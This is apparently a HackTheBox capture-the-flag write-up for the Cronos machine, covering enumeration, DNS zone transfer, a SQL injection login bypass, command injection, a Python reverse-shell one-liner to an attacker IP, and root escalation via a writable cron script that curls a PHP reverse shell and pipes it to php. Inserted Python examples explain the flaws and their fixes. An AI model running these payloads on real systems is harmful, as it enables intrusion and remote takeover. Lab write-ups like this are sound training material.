HTB - Cronos Writeup
- Box: Cronos
- Difficulty: Medium
- Points: 30
- Release: 22 Mar 2017
- IP: 10.10.10.13
1. Nmap Scanning
Starting with a scan of the target IP address:
nmap -sC -sV -oA cronos.nmap 10.10.10.13
The scan shows ports 22, 53 and 80 open. First, let's load up the browser and take a look at port 80.
We see a default Apache2 page like this:
Let’s try and find some directories using GoBuster:
gobuster dir -u http://10.10.10.13/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k
GoBuster finds nothing. The port scan showed DNS open, so let's point nslookup at the target's own DNS server and reverse-resolve the box's IP to see what the server says about itself.
That gives us a domain, cronos.htb. Add it to the hosts file and browse to it.
Running the GoBuster scan again against cronos.htb turns up a robots.txt, but it contains nothing of substance.
Since port 53 is open, let's also attempt a DNS zone transfer (AXFR) against the server and see whether it leaks any more hostnames:
admin.cronos.htb looks interesting, so let's add that to the hosts file as well and browse to it.
Nice! We get a login page, so let's test for an authentication bypass using SQL injection. The payload is taken from the Pentest Blog cheat sheet linked below:
admin' or '1'='1
Pentest Blog cheat sheet:
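Why that single payload is enough to log in, as an added example that is not part of the original writeup: the table, the credential row and the query shape are constructed stand-ins (the page never shows the real login query), but the mechanism is the one the bypass relies on. The vulnerable function formats user input straight into the SQL text; the parameterized version treats the same payload as data.

```python
import sqlite3

# The payload used on the page.
PAYLOAD = "admin' or '1'='1"


def make_db():
    """In-memory stand-in for the login database; the row is a constructed sample."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct-horse')")
    db.commit()
    return db


def build_vulnerable_query(username, password):
    """String-formats user input into the SQL text: the injectable pattern."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def vulnerable_login(db, username, password):
    """Returns the matched username, or None. With PAYLOAD in the username field the
    WHERE clause becomes   username = 'admin' or '1'='1' AND password = '...'
    and, because AND binds tighter than OR, the leading username = 'admin' alone
    (or the trailing '1'='1' when the payload is also in the password field)
    is enough to match a row regardless of the password."""
    row = db.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(db, username, password):
    """Same query with bound parameters: the quotes in PAYLOAD are plain data."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD, PAYLOAD))
    print("vulnerable:", vulnerable_login(db, PAYLOAD, PAYLOAD))  # admin
    print("parameterized:", safe_login(db, PAYLOAD, PAYLOAD))     # None
```

The fix is not escaping quotes by hand but keeping user input out of the query text entirely, which is what the bound parameters do.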
The bypass drops us on a Net Tool v0.1 page that runs a network utility against user-supplied input. If that input reaches a shell, the page may also be vulnerable to command injection.
Looks like it!
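The pattern behind a "ping this host" tool that is injectable, beside a hardened version, as an added example that is not code from the box (the Cronos Net Tool is a PHP page; this is a Python stand-in that makes the same mistake). The injected command here is a harmless echo, so the block runs offline; whether ping itself succeeds does not matter, the command after the `;` runs either way.

```python
import ipaddress
import re
import subprocess

# Hostname allow-list: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.I,
)


def vulnerable_ping(target):
    """The injectable pattern: user input is concatenated into a shell command line,
    so ';', '|', '&&', backticks or $( ) in `target` run whatever follows them."""
    cmd = "ping -c 1 -W 1 " + target
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout + result.stderr


def is_valid_target(target):
    """Accept only an IP address or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def safe_ping(target):
    """Hardened version: allow-list the input, then pass it as a single argv
    element with shell=False, so shell metacharacters are never interpreted."""
    if not is_valid_target(target):
        raise ValueError("refusing target %r" % (target,))
    result = subprocess.run(["ping", "-c", "1", "-W", "1", target],
                            capture_output=True, text=True)
    return result.stdout + result.stderr


if __name__ == "__main__":
    print(vulnerable_ping("127.0.0.1; echo INJECTED"))  # the echo output shows up
    try:
        safe_ping("127.0.0.1; echo INJECTED")
    except ValueError as err:
        print(err)
```

Validation alone is not the fix: passing the argument as a list without a shell is what removes the injection, and the allow-list is a second layer that also stops option injection such as a target beginning with `-`.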
Now that we've confirmed command injection, we can use the Python one-liner below to get a reverse shell; 10.10.14.57 is our attacking machine and 4444 the port our listener is waiting on.
The one-liner comes from the PentestMonkey reverse shell cheat sheet.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.57",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Checking our listener confirms we have a shell.
Next we need to escalate our privileges.
Initial enumeration of the machine doesn't turn up much.
Given the name of the box, let's take a look at /etc/crontab. Here we see something of interest:
The last line shows a file named artisan being executed by root on a schedule.
Checking the permissions on artisan shows our user can write to it. Since artisan is a PHP script that root runs with php, we can simply replace its contents with a snippet that downloads a PHP reverse shell from our host and pipes it into php to execute.
I used the following PentestMonkey shell.
<?php
system('curl http://10.10.14.57/reverse.php | php');
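The misconfiguration being exploited is a root cron job whose script a low-privileged user can write. The following audit script, an added example and not part of the writeup, finds that condition in a system crontab. The crontab text and the file ownership table are constructed samples modelled on the page's description; the path /var/www/app/artisan is a placeholder, not the box's real location, and the metadata dictionary stands in for os.stat() so the block runs offline.

```python
import re
import stat

# Constructed sample in /etc/crontab format (minute hour dom month dow user command).
# The last line mirrors the page's description of a root job running artisan; the
# path is a placeholder.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    /usr/bin/php /var/www/app/artisan schedule:run >> /dev/null 2>&1
"""

# Constructed stand-in for os.stat() results: path -> (owner, group, permission bits).
SAMPLE_FILES = {
    "/usr/bin/php": ("root", "root", 0o755),
    "/etc/cron.hourly": ("root", "root", 0o755),
    "/var/www/app/artisan": ("www-data", "www-data", 0o664),
}

# Five schedule fields, then the user, then the command (@reboot-style shorthand
# is not handled here).
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_system_crontab(text):
    """Return (user, command) for every job line, skipping comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def paths_in_command(cmd):
    """Absolute paths a job touches (interpreter, script, arguments), ignoring
    shell redirection targets such as '>> /dev/null 2>&1'."""
    cmd = re.sub(r"\d*>>?\s*\S+", "", cmd)
    return re.findall(r"(?<!\S)/[\w./-]+", cmd)


def writable_by(user, groups, owner, group, mode):
    """Classic mode-bit check: can `user` (member of `groups`) write the file?
    Ignores POSIX ACLs and the directory's own permissions."""
    if owner == user and mode & stat.S_IWUSR:
        return True
    if group in groups and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def find_hijackable_jobs(crontab_text, files, user, groups):
    """Root jobs that execute or read a path `user` can overwrite: editing that
    file gets arbitrary code run as root at the next scheduled execution."""
    hits = []
    for job_user, cmd in parse_system_crontab(crontab_text):
        if job_user != "root":
            continue
        for path in paths_in_command(cmd):
            meta = files.get(path)
            if meta is not None and writable_by(user, groups, *meta):
                hits.append((path, cmd))
    return hits


if __name__ == "__main__":
    for path, cmd in find_hijackable_jobs(SAMPLE_CRONTAB, SAMPLE_FILES, "www-data", {"www-data"}):
        print("root cron job uses a file writable by www-data:", path, "<-", cmd)
```

On a real host the dictionary would be replaced by os.stat() plus pwd/grp lookups, and the same check is worth running over /etc/cron.d and the directories on the job's PATH, since a writable interpreter or a missing binary earlier in the PATH gives the same result. The fix for the flagged line is the one the assertion in the test applies: make the script root-owned and not group- or world-writable.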
Serve reverse.php from a web server on our host (the URL above uses port 80) and make sure a second nc listener is ready on the port configured in reverse.php.
Within a minute or so the cron job runs artisan and the nc listener receives a shell as root.
It isn't a fully interactive shell, but the following post describes how to upgrade it to one:
The root flag is in /root/root.txt and the user flag in /home/noulis/user.txt.